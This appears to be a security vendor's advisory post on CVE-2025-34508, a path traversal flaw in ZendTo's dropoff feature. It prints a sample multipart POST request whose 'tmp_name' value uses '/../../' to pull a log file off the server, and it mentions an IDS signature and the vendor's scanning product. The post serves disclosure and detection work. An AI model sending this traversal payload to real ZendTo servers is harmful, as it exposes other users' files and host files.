ZendTo 'dropoff' - Path Traversal (CVE-2025-34508)
- Dee Sehejpal BSc (HONS)
- 4 hours ago
- 1 min read
Application Details
ZendTo is an open-source, web-based tool commonly used by universities, research institutions, and enterprises to securely exchange large files with external users.
Vulnerability
A path traversal vulnerability exists in the file dropoff functionality of ZendTo versions 6.15-7 and prior.
Identification
This could allow a remote, authenticated attacker to retrieve the files of other ZendTo users, retrieve files on the host system, or cause a denial of service.
POST /dropoff
--------------------------d74496d66958873e
Content-Disposition: form-data; name="Action"
dropoff
--------------------------d74496d66958873e
Content-Disposition: form-data; name="chunkname"
.
--------------------------d74496d66958873e
Content-Disposition: form-data; name="file_1"
{"name":"zendto.log","type":"","size":"unused","tmp_name":"/../../log/zendto.log","error":0}
--------------------------d74496d66958873e
Detection
By turning this into a traffic file and matching rule, we are able to detect directory traversal attempts by an unauthenticated remote attacker.
Coverage
Idappcom have created signature 8026071 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comments